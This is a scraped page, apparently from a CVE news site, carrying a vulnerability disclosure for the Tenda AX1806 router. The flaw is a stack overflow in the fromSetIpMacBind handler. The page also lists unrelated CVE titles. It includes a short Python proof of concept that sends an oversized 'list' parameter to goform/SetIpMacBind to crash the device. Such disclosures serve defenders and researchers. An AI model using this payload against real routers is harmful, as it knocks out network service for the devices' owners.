CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the list parameter in the function fromSetIpMacBind. This vulnerability allows attackers to cause a Denial of Service (DoS).

Permalink

Cannot retrieve contributors at this time

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/AX1806.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

**Affected version**

v1.0.0.1

**Vulnerability details**

tdhttpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromSetIpMacBind function, which is accessible via the URL goform/SetIpMacBind.

*   

The function takes the POST argument list, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"list": b'A'\*0x800,
    b"bindnum": b"1"
}
res \= requests.post("http://127.0.0.1/goform/SetIpMacBind", data\=data)
print(res.content)

Headline

CVE-2022-28971: IoT-vuln/readme.md at main · d1tto/IoT-vuln

CVE: Latest News